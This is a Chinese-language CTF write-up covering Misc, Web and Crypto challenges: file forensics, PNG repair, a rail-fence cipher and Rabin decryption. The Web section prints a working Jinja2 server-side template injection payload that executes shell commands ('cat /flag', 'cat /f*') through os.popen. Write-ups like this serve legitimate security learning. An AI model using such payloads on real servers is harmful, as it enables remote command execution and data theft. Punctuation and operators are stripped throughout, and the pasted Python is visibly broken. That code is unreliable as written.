ZJPCTF 部分 Misc Web Crypto

MISC听说你是base高手根据hint转为1转为0得0110011000110110001100001011001110111101101100010011000100110010100111001011000110110001000110000011001010010110101100101001101110011000001100100001011010011010001100101001101110110011000101101001110000011010001100001011000010010110100110011011000100011010000110110011000100110010001100010001100100011100000110100011001000110001101111101得到flag为flag{bbe9cb0e-e70d-4e7f-84aa-3b46bdb284dc}TestYourtool丢到010中可以发现藏有一个图片提取出来发现是个二维码扫一下得flag flag{7c66921f-7b08-4e17-b869-209a2c8facb3}我是吹风机flag{chuifengji_is_my_s0n}修修文件吧用010打开发现IDAT与IHDR的位置反了改了又发现png被改了改回来发现图片依旧有问题看不出了。Hint发布了发现IDAT前都是0000 00 00没有长度看到最后一个IDAT为00 0067FF把全部的IDAT前都修改了得到一个图片最上面有一条蓝色猜测是LSB隐写用stegslove打不开用随波逐流提取到了信息得到flag为flag{3bf4db5d-6d91-4361-b82c-46946eaaf52a}WebBabyssti输入${7*7}不变输入{{7*7}}得49再输入{{7*’7’}}得到7777777说明是jinja2由于刚开始学SSTI于是借助了脚本工具得到payload{name:{{(cycler.next.__globals__.os.popen(cat/flag)).read()}}}但是没得到flag回显为空怀疑flag被过滤了用f*代替得payload{name: {{(cycler.next.__globals__.os.popen(cat /f*)).read()}}}得到flag为flag{essywwtiss2333tij2njina}CryptoezCryptoBase64得fa{4yCyt_uubc0lg3s_rpobcouu}看到fa和lg分开猜测为栅栏发现为栅栏分为2栏得flag为flag{34sy_Crypto_bucuobucu0}Rabin是坏蛋_revenge猜测为rabin解密用脚本解得到flagflag{dwiajodijaoixjaiojwoija1234}importgmpy2importlibnump9109516638675942224743777995148545134530013554275734886455448931671863095997507569243594319863772181509837924098591463427796446396931029539716403962408943q10740686879425642178311117871838817113230054398803925695044823186721569157087087148128828336409020272313601366223259400603169731251187486908754100440733959n97842465838936271091714965964228165393845896702260786633118006055553245825872989978836351767575405061243582903434469955603771193732927128628612173253023043872135304863746774195471255945943279688715098619579698816460325299502597208003554338834015099194316248747638417358575903671366933167829283512080625395337c140655211554927678503347324092478047438045251131293471286425677406100240063574753515992620829045521915462201396598103882338968738138846160402436956319724406025e 2inv_pgmpy2.invert(p,q)inv_qgmpy2.invert(q,p)mppow(c,(p1)//4,p)mqpow(c,(q1)//4,q)a(inv_p*p*mqinv_q*q*mp)%n